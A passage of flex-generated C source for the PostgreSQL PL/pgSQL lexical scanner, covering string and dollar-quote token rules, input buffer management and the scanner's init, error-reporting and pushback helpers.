* ---------- */ case 82: YY_RULE_SETUP #line 270 "scan.l" { start_lineno = plpgsql_scanner_lineno(); start_charpos = plpgsql_base_yytext; BEGIN(IN_STRING); } YY_BREAK case 83: YY_RULE_SETUP #line 275 "scan.l" { /* for now, treat the same as a regular literal */ start_lineno = plpgsql_scanner_lineno(); start_charpos = plpgsql_base_yytext; BEGIN(IN_STRING); } YY_BREAK case 84: YY_RULE_SETUP #line 281 "scan.l" { } YY_BREAK case 85: YY_RULE_SETUP #line 282 "scan.l" { /* can only happen with \ at EOF */ } YY_BREAK case 86: YY_RULE_SETUP #line 283 "scan.l" { } YY_BREAK case 87: YY_RULE_SETUP #line 284 "scan.l" { /* tell plpgsql_get_string_value it's not a dollar quote */ dolqlen = 0; /* adjust plpgsql_base_yytext/plpgsql_base_yyleng to describe whole string token */ plpgsql_base_yyleng += (plpgsql_base_yytext - start_charpos); plpgsql_base_yytext = start_charpos; BEGIN(INITIAL); return T_STRING; } YY_BREAK case 88: /* rule 88 can match eol */ YY_RULE_SETUP #line 293 "scan.l" { } YY_BREAK case YY_STATE_EOF(IN_STRING): #line 294 "scan.l" { plpgsql_error_lineno = start_lineno; ereport(ERROR, (errcode(ERRCODE_DATATYPE_MISMATCH), errmsg("unterminated string"))); } YY_BREAK case 89: YY_RULE_SETUP #line 301 "scan.l" { start_lineno = plpgsql_scanner_lineno(); start_charpos = plpgsql_base_yytext; dolqstart = pstrdup(plpgsql_base_yytext); BEGIN(IN_DOLLARQUOTE); } YY_BREAK case 90: YY_RULE_SETUP #line 307 "scan.l" { if (strcmp(plpgsql_base_yytext, dolqstart) == 0) { pfree(dolqstart); /* tell plpgsql_get_string_value it is a dollar quote */ dolqlen = plpgsql_base_yyleng; /* adjust plpgsql_base_yytext/plpgsql_base_yyleng to describe whole string token */ plpgsql_base_yyleng += (plpgsql_base_yytext - start_charpos); plpgsql_base_yytext = start_charpos; BEGIN(INITIAL); return T_STRING; } else { /* * When we fail to match $...$ to dolqstart, transfer * the $... part to the output, but put back the final * $ for rescanning. Consider $delim$...$junk$delim$ */ yyless(plpgsql_base_yyleng-1); } } YY_BREAK case 91: /* rule 91 can match eol */ YY_RULE_SETUP #line 329 "scan.l" { } YY_BREAK case 92: YY_RULE_SETUP #line 330 "scan.l" { /* needed for $ inside the quoted text */ } YY_BREAK case YY_STATE_EOF(IN_DOLLARQUOTE): #line 331 "scan.l" { plpgsql_error_lineno = start_lineno; ereport(ERROR, (errcode(ERRCODE_DATATYPE_MISMATCH), errmsg("unterminated dollar-quoted string"))); } YY_BREAK /* ---------- * Any unmatched character is returned as is * ---------- */ case 93: YY_RULE_SETUP #line 342 "scan.l" { return plpgsql_base_yytext[0]; } YY_BREAK case 94: YY_RULE_SETUP #line 344 "scan.l" YY_FATAL_ERROR( "flex scanner jammed" ); YY_BREAK #line 2120 "pl_scan.c" case YY_STATE_EOF(INITIAL): yyterminate(); case YY_END_OF_BUFFER: { /* Amount of text matched not including the EOB char. */ int yy_amount_of_matched_text = (int) (yy_cp - (yytext_ptr)) - 1; /* Undo the effects of YY_DO_BEFORE_ACTION. */ *yy_cp = (yy_hold_char); YY_RESTORE_YY_MORE_OFFSET if ( YY_CURRENT_BUFFER_LVALUE->yy_buffer_status == YY_BUFFER_NEW ) { /* We're scanning a new file or input source. It's * possible that this happened because the user * just pointed plpgsql_base_yyin at a new source and called * plpgsql_base_yylex(). If so, then we have to assure * consistency between YY_CURRENT_BUFFER and our * globals. Here is the right place to do so, because * this is the first action (other than possibly a * back-up) that will match for the new input source. 
*/ (yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_n_chars; YY_CURRENT_BUFFER_LVALUE->yy_input_file = plpgsql_base_yyin; YY_CURRENT_BUFFER_LVALUE->yy_buffer_status = YY_BUFFER_NORMAL; } /* Note that here we test for yy_c_buf_p "<=" to the position * of the first EOB in the buffer, since yy_c_buf_p will * already have been incremented past the NUL character * (since all states make transitions on EOB to the * end-of-buffer state). Contrast this with the test * in input(). */ if ( (yy_c_buf_p) <= &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] ) { /* This was really a NUL. */ yy_state_type yy_next_state; (yy_c_buf_p) = (yytext_ptr) + yy_amount_of_matched_text; yy_current_state = yy_get_previous_state( ); /* Okay, we're now positioned to make the NUL * transition. We couldn't have * yy_get_previous_state() go ahead and do it * for us because it doesn't know how to deal * with the possibility of jamming (and we don't * want to build jamming into it because then it * will run more slowly). */ yy_next_state = yy_try_NUL_trans( yy_current_state ); yy_bp = (yytext_ptr) + YY_MORE_ADJ; if ( yy_next_state ) { /* Consume the NUL. */ yy_cp = ++(yy_c_buf_p); yy_current_state = yy_next_state; goto yy_match; } else { yy_cp = (yy_last_accepting_cpos); yy_current_state = (yy_last_accepting_state); goto yy_find_action; } } else switch ( yy_get_next_buffer( ) ) { case EOB_ACT_END_OF_FILE: { (yy_did_buffer_switch_on_eof) = 0; if ( plpgsql_base_yywrap( ) ) { /* Note: because we've taken care in * yy_get_next_buffer() to have set up * plpgsql_base_yytext, we can now set up * yy_c_buf_p so that if some total * hoser (like flex itself) wants to * call the scanner after we return the * YY_NULL, it'll still work - another * YY_NULL will get returned. */ (yy_c_buf_p) = (yytext_ptr) + YY_MORE_ADJ; yy_act = YY_STATE_EOF(YY_START); goto do_action; } else { if ( ! (yy_did_buffer_switch_on_eof) ) YY_NEW_FILE; } break; } case EOB_ACT_CONTINUE_SCAN: (yy_c_buf_p) = (yytext_ptr) + yy_amount_of_matched_text; yy_current_state = yy_get_previous_state( ); yy_cp = (yy_c_buf_p); yy_bp = (yytext_ptr) + YY_MORE_ADJ; goto yy_match; case EOB_ACT_LAST_MATCH: (yy_c_buf_p) = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)]; yy_current_state = yy_get_previous_state( ); yy_cp = (yy_c_buf_p); yy_bp = (yytext_ptr) + YY_MORE_ADJ; goto yy_find_action; } break; } default: YY_FATAL_ERROR( "fatal flex scanner internal error--no action found" ); } /* end of action switch */ } /* end of scanning one token */ } /* end of plpgsql_base_yylex */ /* yy_get_next_buffer - try to read in a new buffer * * Returns a code representing an action: * EOB_ACT_LAST_MATCH - * EOB_ACT_CONTINUE_SCAN - continue scanning from current position * EOB_ACT_END_OF_FILE - end of file */ static int yy_get_next_buffer (void) { register char *dest = YY_CURRENT_BUFFER_LVALUE->yy_ch_buf; register char *source = (yytext_ptr); register int number_to_move, i; int ret_val; if ( (yy_c_buf_p) > &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] ) YY_FATAL_ERROR( "fatal flex scanner internal error--end of buffer missed" ); if ( YY_CURRENT_BUFFER_LVALUE->yy_fill_buffer == 0 ) { /* Don't try to fill the buffer, so this is an EOF. */ if ( (yy_c_buf_p) - (yytext_ptr) - YY_MORE_ADJ == 1 ) { /* We matched a single character, the EOB, so * treat this as a final EOF. */ return EOB_ACT_END_OF_FILE; } else { /* We matched some text prior to the EOB, first * process it. */ return EOB_ACT_LAST_MATCH; } } /* Try to read more data. */ /* First move last chars to start of buffer. 
*/ number_to_move = (int) ((yy_c_buf_p) - (yytext_ptr)) - 1; for ( i = 0; i < number_to_move; ++i ) *(dest++) = *(source++); if ( YY_CURRENT_BUFFER_LVALUE->yy_buffer_status == YY_BUFFER_EOF_PENDING ) /* don't do the read, it's not guaranteed to return an EOF, * just force an EOF */ YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars) = 0; else { int num_to_read = YY_CURRENT_BUFFER_LVALUE->yy_buf_size - number_to_move - 1; while ( num_to_read <= 0 ) { /* Not enough room in the buffer - grow it. */ /* just a shorter name for the current buffer */ YY_BUFFER_STATE b = YY_CURRENT_BUFFER; int yy_c_buf_p_offset = (int) ((yy_c_buf_p) - b->yy_ch_buf); if ( b->yy_is_our_buffer ) { int new_size = b->yy_buf_size * 2; if ( new_size <= 0 ) b->yy_buf_size += b->yy_buf_size / 8; else b->yy_buf_size *= 2; b->yy_ch_buf = (char *) /* Include room for the 2 EOB chars. */ plpgsql_base_yyrealloc((void *) b->yy_ch_buf,b->yy_buf_size + 2 ); } else /* Can't grow it, we don't own it. */ b->yy_ch_buf = 0; if ( ! b->yy_ch_buf ) YY_FATAL_ERROR( "fatal error - scanner input buffer overflow" ); (yy_c_buf_p) = &b->yy_ch_buf[yy_c_buf_p_offset]; num_to_read = YY_CURRENT_BUFFER_LVALUE->yy_buf_size - number_to_move - 1; } if ( num_to_read > YY_READ_BUF_SIZE ) num_to_read = YY_READ_BUF_SIZE; /* Read in more data. */ YY_INPUT( (&YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[number_to_move]), (yy_n_chars), (size_t) num_to_read ); YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars); } if ( (yy_n_chars) == 0 ) { if ( number_to_move == YY_MORE_ADJ ) { ret_val = EOB_ACT_END_OF_FILE; plpgsql_base_yyrestart(plpgsql_base_yyin ); } else { ret_val = EOB_ACT_LAST_MATCH; YY_CURRENT_BUFFER_LVALUE->yy_buffer_status = YY_BUFFER_EOF_PENDING; } } else ret_val = EOB_ACT_CONTINUE_SCAN; if ((yy_size_t) ((yy_n_chars) + number_to_move) > YY_CURRENT_BUFFER_LVALUE->yy_buf_size) { /* Extend the array by 50%, plus the number we really need. */ yy_size_t new_size = (yy_n_chars) + number_to_move + ((yy_n_chars) >> 1); YY_CURRENT_BUFFER_LVALUE->yy_ch_buf = (char *) plpgsql_base_yyrealloc((void *) YY_CURRENT_BUFFER_LVALUE->yy_ch_buf,new_size ); if ( ! YY_CURRENT_BUFFER_LVALUE->yy_ch_buf ) YY_FATAL_ERROR( "out of dynamic memory in yy_get_next_buffer()" ); } (yy_n_chars) += number_to_move; YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] = YY_END_OF_BUFFER_CHAR; YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] = YY_END_OF_BUFFER_CHAR; (yytext_ptr) = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[0]; return ret_val; } /* yy_get_previous_state - get the state just before the EOB char was reached */ static yy_state_type yy_get_previous_state (void) { register yy_state_type yy_current_state; register char *yy_cp; yy_current_state = (yy_start); yy_current_state += YY_AT_BOL(); for ( yy_cp = (yytext_ptr) + YY_MORE_ADJ; yy_cp < (yy_c_buf_p); ++yy_cp ) { register YY_CHAR yy_c = (*yy_cp ?
yy_ec[YY_SC_TO_UI(*yy_cp)] : 1); if ( yy_accept[yy_current_state] ) { (yy_last_accepting_state) = yy_current_state; (yy_last_accepting_cpos) = yy_cp; } while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) { yy_current_state = (int) yy_def[yy_current_state]; if ( yy_current_state >= 373 ) yy_c = yy_meta[(unsigned int) yy_c]; } yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; } return yy_current_state; } /* yy_try_NUL_trans - try to make a transition on the NUL character * * synopsis * next_state = yy_try_NUL_trans( current_state ); */ static yy_state_type yy_try_NUL_trans (yy_state_type yy_current_state ) { register int yy_is_jam; register char *yy_cp = (yy_c_buf_p); register YY_CHAR yy_c = 1; if ( yy_accept[yy_current_state] ) { (yy_last_accepting_state) = yy_current_state; (yy_last_accepting_cpos) = yy_cp; } while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) { yy_current_state = (int) yy_def[yy_current_state]; if ( yy_current_state >= 373 ) yy_c = yy_meta[(unsigned int) yy_c]; } yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; yy_is_jam = (yy_current_state == 372); return yy_is_jam ? 0 : yy_current_state; } #ifndef YY_NO_INPUT #ifdef __cplusplus static int yyinput (void) #else static int input (void) #endif { int c; *(yy_c_buf_p) = (yy_hold_char); if ( *(yy_c_buf_p) == YY_END_OF_BUFFER_CHAR ) { /* yy_c_buf_p now points to the character we want to return. * If this occurs *before* the EOB characters, then it's a * valid NUL; if not, then we've hit the end of the buffer. */ if ( (yy_c_buf_p) < &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars)] ) /* This was really a NUL. */ *(yy_c_buf_p) = '\0'; else { /* need more input */ int offset = (yy_c_buf_p) - (yytext_ptr); ++(yy_c_buf_p); switch ( yy_get_next_buffer( ) ) { case EOB_ACT_LAST_MATCH: /* This happens because yy_g_n_b() * sees that we've accumulated a * token and flags that we need to * try matching the token before * proceeding. But for input(), * there's no matching to consider. * So convert the EOB_ACT_LAST_MATCH * to EOB_ACT_END_OF_FILE. */ /* Reset buffer status. */ plpgsql_base_yyrestart(plpgsql_base_yyin ); /*FALLTHROUGH*/ case EOB_ACT_END_OF_FILE: { if ( plpgsql_base_yywrap( ) ) return EOF; if ( ! (yy_did_buffer_switch_on_eof) ) YY_NEW_FILE; #ifdef __cplusplus return yyinput(); #else return input(); #endif } case EOB_ACT_CONTINUE_SCAN: (yy_c_buf_p) = (yytext_ptr) + offset; break; } } } c = *(unsigned char *) (yy_c_buf_p); /* cast for 8-bit char's */ *(yy_c_buf_p) = '\0'; /* preserve plpgsql_base_yytext */ (yy_hold_char) = *++(yy_c_buf_p); YY_CURRENT_BUFFER_LVALUE->yy_at_bol = (c == '\n'); return c; } #endif /* ifndef YY_NO_INPUT */ /** Immediately switch to a different input stream. * @param input_file A readable stream. * * @note This function does not reset the start condition to @c INITIAL . */ void plpgsql_base_yyrestart (FILE * input_file ) { if ( ! YY_CURRENT_BUFFER ){ plpgsql_base_yyensure_buffer_stack (); YY_CURRENT_BUFFER_LVALUE = plpgsql_base_yy_create_buffer(plpgsql_base_yyin,YY_BUF_SIZE ); } plpgsql_base_yy_init_buffer(YY_CURRENT_BUFFER,input_file ); plpgsql_base_yy_load_buffer_state( ); } /** Switch to a different input buffer. * @param new_buffer The new input buffer. * */ void plpgsql_base_yy_switch_to_buffer (YY_BUFFER_STATE new_buffer ) { /* TODO. 
We should be able to replace this entire function body * with * plpgsql_base_yypop_buffer_state(); * plpgsql_base_yypush_buffer_state(new_buffer); */ plpgsql_base_yyensure_buffer_stack (); if ( YY_CURRENT_BUFFER == new_buffer ) return; if ( YY_CURRENT_BUFFER ) { /* Flush out information for old buffer. */ *(yy_c_buf_p) = (yy_hold_char); YY_CURRENT_BUFFER_LVALUE->yy_buf_pos = (yy_c_buf_p); YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars); } YY_CURRENT_BUFFER_LVALUE = new_buffer; plpgsql_base_yy_load_buffer_state( ); /* We don't actually know whether we did this switch during * EOF (plpgsql_base_yywrap()) processing, but the only time this flag * is looked at is after plpgsql_base_yywrap() is called, so it's safe * to go ahead and always set it. */ (yy_did_buffer_switch_on_eof) = 1; } static void plpgsql_base_yy_load_buffer_state (void) { (yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_n_chars; (yytext_ptr) = (yy_c_buf_p) = YY_CURRENT_BUFFER_LVALUE->yy_buf_pos; plpgsql_base_yyin = YY_CURRENT_BUFFER_LVALUE->yy_input_file; (yy_hold_char) = *(yy_c_buf_p); } /** Allocate and initialize an input buffer state. * @param file A readable stream. * @param size The character buffer size in bytes. When in doubt, use @c YY_BUF_SIZE. * * @return the allocated buffer state. */ YY_BUFFER_STATE plpgsql_base_yy_create_buffer (FILE * file, int size ) { YY_BUFFER_STATE b; b = (YY_BUFFER_STATE) plpgsql_base_yyalloc(sizeof( struct yy_buffer_state ) ); if ( ! b ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yy_create_buffer()" ); b->yy_buf_size = size; /* yy_ch_buf has to be 2 characters longer than the size given because * we need to put in 2 end-of-buffer characters. */ b->yy_ch_buf = (char *) plpgsql_base_yyalloc(b->yy_buf_size + 2 ); if ( ! b->yy_ch_buf ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yy_create_buffer()" ); b->yy_is_our_buffer = 1; plpgsql_base_yy_init_buffer(b,file ); return b; } /** Destroy the buffer. * @param b a buffer created with plpgsql_base_yy_create_buffer() * */ void plpgsql_base_yy_delete_buffer (YY_BUFFER_STATE b ) { if ( ! b ) return; if ( b == YY_CURRENT_BUFFER ) /* Not sure if we should pop here. */ YY_CURRENT_BUFFER_LVALUE = (YY_BUFFER_STATE) 0; if ( b->yy_is_our_buffer ) plpgsql_base_yyfree((void *) b->yy_ch_buf ); plpgsql_base_yyfree((void *) b ); } /* Initializes or reinitializes a buffer. * This function is sometimes called more than once on the same buffer, * such as during a plpgsql_base_yyrestart() or at EOF. */ static void plpgsql_base_yy_init_buffer (YY_BUFFER_STATE b, FILE * file ) { int oerrno = errno; plpgsql_base_yy_flush_buffer(b ); b->yy_input_file = file; b->yy_fill_buffer = 1; /* If b is the current buffer, then plpgsql_base_yy_init_buffer was _probably_ * called from plpgsql_base_yyrestart() or through yy_get_next_buffer. * In that case, we don't want to reset the lineno or column. */ if (b != YY_CURRENT_BUFFER){ b->yy_bs_lineno = 1; b->yy_bs_column = 0; } b->yy_is_interactive = 0; errno = oerrno; } /** Discard all buffered characters. On the next scan, YY_INPUT will be called. * @param b the buffer state to be flushed, usually @c YY_CURRENT_BUFFER. * */ void plpgsql_base_yy_flush_buffer (YY_BUFFER_STATE b ) { if ( ! b ) return; b->yy_n_chars = 0; /* We always need two end-of-buffer characters. The first causes * a transition to the end-of-buffer state. The second causes * a jam in that state. 
*/ b->yy_ch_buf[0] = YY_END_OF_BUFFER_CHAR; b->yy_ch_buf[1] = YY_END_OF_BUFFER_CHAR; b->yy_buf_pos = &b->yy_ch_buf[0]; b->yy_at_bol = 1; b->yy_buffer_status = YY_BUFFER_NEW; if ( b == YY_CURRENT_BUFFER ) plpgsql_base_yy_load_buffer_state( ); } /** Pushes the new state onto the stack. The new state becomes * the current state. This function will allocate the stack * if necessary. * @param new_buffer The new state. * */ void plpgsql_base_yypush_buffer_state (YY_BUFFER_STATE new_buffer ) { if (new_buffer == NULL) return; plpgsql_base_yyensure_buffer_stack(); /* This block is copied from plpgsql_base_yy_switch_to_buffer. */ if ( YY_CURRENT_BUFFER ) { /* Flush out information for old buffer. */ *(yy_c_buf_p) = (yy_hold_char); YY_CURRENT_BUFFER_LVALUE->yy_buf_pos = (yy_c_buf_p); YY_CURRENT_BUFFER_LVALUE->yy_n_chars = (yy_n_chars); } /* Only push if top exists. Otherwise, replace top. */ if (YY_CURRENT_BUFFER) (yy_buffer_stack_top)++; YY_CURRENT_BUFFER_LVALUE = new_buffer; /* copied from plpgsql_base_yy_switch_to_buffer. */ plpgsql_base_yy_load_buffer_state( ); (yy_did_buffer_switch_on_eof) = 1; } /** Removes and deletes the top of the stack, if present. * The next element becomes the new top. * */ void plpgsql_base_yypop_buffer_state (void) { if (!YY_CURRENT_BUFFER) return; plpgsql_base_yy_delete_buffer(YY_CURRENT_BUFFER ); YY_CURRENT_BUFFER_LVALUE = NULL; if ((yy_buffer_stack_top) > 0) --(yy_buffer_stack_top); if (YY_CURRENT_BUFFER) { plpgsql_base_yy_load_buffer_state( ); (yy_did_buffer_switch_on_eof) = 1; } } /* Allocates the stack if it does not exist. * Guarantees space for at least one push. */ static void plpgsql_base_yyensure_buffer_stack (void) { int num_to_alloc; if (!(yy_buffer_stack)) { /* First allocation is just for one element, since we don't know yet * whether this scanner will even need a stack; the stack is grown * below, eight slots at a time, whenever a push needs more room. */ num_to_alloc = 1; (yy_buffer_stack) = (struct yy_buffer_state**)plpgsql_base_yyalloc (num_to_alloc * sizeof(struct yy_buffer_state*) ); if ( ! (yy_buffer_stack) ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yyensure_buffer_stack()" ); memset((yy_buffer_stack), 0, num_to_alloc * sizeof(struct yy_buffer_state*)); (yy_buffer_stack_max) = num_to_alloc; (yy_buffer_stack_top) = 0; return; } if ((yy_buffer_stack_top) >= ((yy_buffer_stack_max)) - 1){ /* Increase the buffer to prepare for a possible push. */ int grow_size = 8 /* arbitrary grow size */; num_to_alloc = (yy_buffer_stack_max) + grow_size; (yy_buffer_stack) = (struct yy_buffer_state**)plpgsql_base_yyrealloc ((yy_buffer_stack), num_to_alloc * sizeof(struct yy_buffer_state*) ); if ( ! (yy_buffer_stack) ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yyensure_buffer_stack()" ); /* zero only the new slots. */ memset((yy_buffer_stack) + (yy_buffer_stack_max), 0, grow_size * sizeof(struct yy_buffer_state*)); (yy_buffer_stack_max) = num_to_alloc; } } /** Setup the input buffer state to scan directly from a user-specified character buffer. * @param base the character buffer * @param size the size in bytes of the character buffer * * @return the newly allocated buffer state object. */ YY_BUFFER_STATE plpgsql_base_yy_scan_buffer (char * base, yy_size_t size ) { YY_BUFFER_STATE b; if ( size < 2 || base[size-2] != YY_END_OF_BUFFER_CHAR || base[size-1] != YY_END_OF_BUFFER_CHAR ) /* They forgot to leave room for the EOB's. */ return 0; b = (YY_BUFFER_STATE) plpgsql_base_yyalloc(sizeof( struct yy_buffer_state ) ); if ( !
b ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yy_scan_buffer()" ); b->yy_buf_size = size - 2; /* "- 2" to take care of EOB's */ b->yy_buf_pos = b->yy_ch_buf = base; b->yy_is_our_buffer = 0; b->yy_input_file = 0; b->yy_n_chars = b->yy_buf_size; b->yy_is_interactive = 0; b->yy_at_bol = 1; b->yy_fill_buffer = 0; b->yy_buffer_status = YY_BUFFER_NEW; plpgsql_base_yy_switch_to_buffer(b ); return b; } /** Setup the input buffer state to scan a string. The next call to plpgsql_base_yylex() will * scan from a @e copy of @a str. * @param yystr a NUL-terminated string to scan * * @return the newly allocated buffer state object. * @note If you want to scan bytes that may contain NUL values, then use * plpgsql_base_yy_scan_bytes() instead. */ YY_BUFFER_STATE plpgsql_base_yy_scan_string (yyconst char * yystr ) { return plpgsql_base_yy_scan_bytes(yystr,strlen(yystr) ); } /** Setup the input buffer state to scan the given bytes. The next call to plpgsql_base_yylex() will * scan from a @e copy of @a bytes. * @param bytes the byte buffer to scan * @param len the number of bytes in the buffer pointed to by @a bytes. * * @return the newly allocated buffer state object. */ YY_BUFFER_STATE plpgsql_base_yy_scan_bytes (yyconst char * yybytes, int _yybytes_len ) { YY_BUFFER_STATE b; char *buf; yy_size_t n; int i; /* Get memory for full buffer, including space for trailing EOB's. */ n = _yybytes_len + 2; buf = (char *) plpgsql_base_yyalloc(n ); if ( ! buf ) YY_FATAL_ERROR( "out of dynamic memory in plpgsql_base_yy_scan_bytes()" ); for ( i = 0; i < _yybytes_len; ++i ) buf[i] = yybytes[i]; buf[_yybytes_len] = buf[_yybytes_len+1] = YY_END_OF_BUFFER_CHAR; b = plpgsql_base_yy_scan_buffer(buf,n ); if ( ! b ) YY_FATAL_ERROR( "bad buffer in plpgsql_base_yy_scan_bytes()" ); /* It's okay to grow etc. this buffer, and we should throw it * away when we're done. */ b->yy_is_our_buffer = 1; return b; } #ifndef YY_EXIT_FAILURE #define YY_EXIT_FAILURE 2 #endif static void yy_fatal_error (yyconst char* msg ) { (void) fprintf( stderr, "%s\n", msg ); exit( YY_EXIT_FAILURE ); } /* Redefine yyless() so it works in section 3 code. */ #undef yyless #define yyless(n) \ do \ { \ /* Undo effects of setting up plpgsql_base_yytext. */ \ int yyless_macro_arg = (n); \ YY_LESS_LINENO(yyless_macro_arg);\ plpgsql_base_yytext[plpgsql_base_yyleng] = (yy_hold_char); \ (yy_c_buf_p) = plpgsql_base_yytext + yyless_macro_arg; \ (yy_hold_char) = *(yy_c_buf_p); \ *(yy_c_buf_p) = '\0'; \ plpgsql_base_yyleng = yyless_macro_arg; \ } \ while ( 0 ) /* Accessor methods (get/set functions) to struct members. */ /** Get the current line number. * */ int plpgsql_base_yyget_lineno (void) { return plpgsql_base_yylineno; } /** Get the input stream. * */ FILE *plpgsql_base_yyget_in (void) { return plpgsql_base_yyin; } /** Get the output stream. * */ FILE *plpgsql_base_yyget_out (void) { return plpgsql_base_yyout; } /** Get the length of the current token. * */ int plpgsql_base_yyget_leng (void) { return plpgsql_base_yyleng; } /** Get the current token. * */ char *plpgsql_base_yyget_text (void) { return plpgsql_base_yytext; } /** Set the current line number. * @param line_number * */ void plpgsql_base_yyset_lineno (int line_number ) { plpgsql_base_yylineno = line_number; } /** Set the input stream. This does not discard the current * input buffer. * @param in_str A readable stream. 
* * @see plpgsql_base_yy_switch_to_buffer */ void plpgsql_base_yyset_in (FILE * in_str ) { plpgsql_base_yyin = in_str ; } void plpgsql_base_yyset_out (FILE * out_str ) { plpgsql_base_yyout = out_str ; } int plpgsql_base_yyget_debug (void) { return plpgsql_base_yy_flex_debug; } void plpgsql_base_yyset_debug (int bdebug ) { plpgsql_base_yy_flex_debug = bdebug ; } static int yy_init_globals (void) { /* Initialization is the same as for the non-reentrant scanner. * This function is called from plpgsql_base_yylex_destroy(), so don't allocate here. */ (yy_buffer_stack) = 0; (yy_buffer_stack_top) = 0; (yy_buffer_stack_max) = 0; (yy_c_buf_p) = (char *) 0; (yy_init) = 0; (yy_start) = 0; /* Defined in main.c */ #ifdef YY_STDINIT plpgsql_base_yyin = stdin; plpgsql_base_yyout = stdout; #else plpgsql_base_yyin = (FILE *) 0; plpgsql_base_yyout = (FILE *) 0; #endif /* For future reference: Set errno on error, since we are called by * plpgsql_base_yylex_init() */ return 0; } /* plpgsql_base_yylex_destroy is for both reentrant and non-reentrant scanners. */ int plpgsql_base_yylex_destroy (void) { /* Pop the buffer stack, destroying each element. */ while(YY_CURRENT_BUFFER){ plpgsql_base_yy_delete_buffer(YY_CURRENT_BUFFER ); YY_CURRENT_BUFFER_LVALUE = NULL; plpgsql_base_yypop_buffer_state(); } /* Destroy the stack itself. */ plpgsql_base_yyfree((yy_buffer_stack) ); (yy_buffer_stack) = NULL; /* Reset the globals. This is important in a non-reentrant scanner so the next time * plpgsql_base_yylex() is called, initialization will occur. */ yy_init_globals( ); return 0; } /* * Internal utility routines. */ #ifndef yytext_ptr static void yy_flex_strncpy (char* s1, yyconst char * s2, int n ) { register int i; for ( i = 0; i < n; ++i ) s1[i] = s2[i]; } #endif #ifdef YY_NEED_STRLEN static int yy_flex_strlen (yyconst char * s ) { register int n; for ( n = 0; s[n]; ++n ) ; return n; } #endif void *plpgsql_base_yyalloc (yy_size_t size ) { return (void *) malloc( size ); } void *plpgsql_base_yyrealloc (void * ptr, yy_size_t size ) { /* The cast to (char *) in the following accommodates both * implementations that use char* generic pointers, and those * that use void* generic pointers. It works with the latter * because both ANSI C and C++ allow castless assignment from * any pointer type to void*, and deal with argument conversions * as though doing an assignment. */ return (void *) realloc( (char *) ptr, size ); } void plpgsql_base_yyfree (void * ptr ) { free( (char *) ptr ); /* see plpgsql_base_yyrealloc() for (char *) cast */ } #define YYTABLES_NAME "yytables" #line 344 "scan.l" /* * This is the plpgsql_base_yylex routine called from outside. It exists to provide * a one-token pushback facility. Beware of trying to make it do more: * for the most part, plpgsql's gram.y assumes that plpgsql_base_yytext is in step * with the "current token". */ int plpgsql_yylex(void) { if (have_pushback_token) { have_pushback_token = false; return pushback_token; } return plpgsql_base_yylex(); } /* * Push back a single token to be re-read by next plpgsql_yylex() call. * * NOTE: this does not cause plpgsql_base_yytext to "back up". */ void plpgsql_push_back_token(int token) { if (have_pushback_token) elog(ERROR, "cannot push back multiple tokens"); pushback_token = token; have_pushback_token = true; } /* * Report a syntax error. 
*/ void plpgsql_yyerror(const char *message) { const char *loc = plpgsql_base_yytext; int cursorpos; plpgsql_error_lineno = plpgsql_scanner_lineno(); /* in multibyte encodings, return index in characters not bytes */ cursorpos = pg_mbstrlen_with_len(scanbuf, loc - scanbuf) + 1; if (*loc == YY_END_OF_BUFFER_CHAR) { ereport(ERROR, (errcode(ERRCODE_SYNTAX_ERROR), /* translator: %s is typically "syntax error" */ errmsg("%s at end of input", message), internalerrposition(cursorpos), internalerrquery(scanstr))); } else { ereport(ERROR, (errcode(ERRCODE_SYNTAX_ERROR), /* translator: first %s is typically "syntax error" */ errmsg("%s at or near \"%s\"", message, loc), internalerrposition(cursorpos), internalerrquery(scanstr))); } } /* * Get the line number at which the current token ends. This substitutes * for flex's very poorly implemented plpgsql_base_yylineno facility. * * We assume that flex has written a '\0' over the character following the * current token in scanbuf. So, we just have to count the '\n' characters * before that. We optimize this a little by keeping track of the last * '\n' seen so far. */ int plpgsql_scanner_lineno(void) { const char *c; while ((c = strchr(cur_line_start, '\n')) != NULL) { cur_line_start = c + 1; cur_line_num++; } return cur_line_num; } /* * Called before any actual parsing is done * * Note: the passed "str" must remain valid until plpgsql_scanner_finish(). * Although it is not fed directly to flex, we need the original string * to cite in error messages. */ void plpgsql_scanner_init(const char *str, int functype) { Size slen; slen = strlen(str); /* * Might be left over after ereport() */ if (YY_CURRENT_BUFFER) plpgsql_base_yy_delete_buffer(YY_CURRENT_BUFFER); /* * Make a scan buffer with special termination needed by flex. */ scanbuf = palloc(slen + 2); memcpy(scanbuf, str, slen); scanbuf[slen] = scanbuf[slen + 1] = YY_END_OF_BUFFER_CHAR; scanbufhandle = plpgsql_base_yy_scan_buffer(scanbuf,slen + 2); /* Other setup */ scanstr = str; scanner_functype = functype; scanner_typereported = false; have_pushback_token = false; cur_line_start = scanbuf; cur_line_num = 1; /*---------- * Hack: skip any initial newline, so that in the common coding layout * CREATE FUNCTION ... AS ' * code body * ' LANGUAGE plpgsql; * we will think "line 1" is what the programmer thinks of as line 1. *---------- */ if (*cur_line_start == '\r') cur_line_start++; if (*cur_line_start == '\n') cur_line_start++; BEGIN(INITIAL); } /* * Called after parsing is done to clean up after plpgsql_scanner_init() */ void plpgsql_scanner_finish(void) { plpgsql_base_yy_delete_buffer(scanbufhandle); 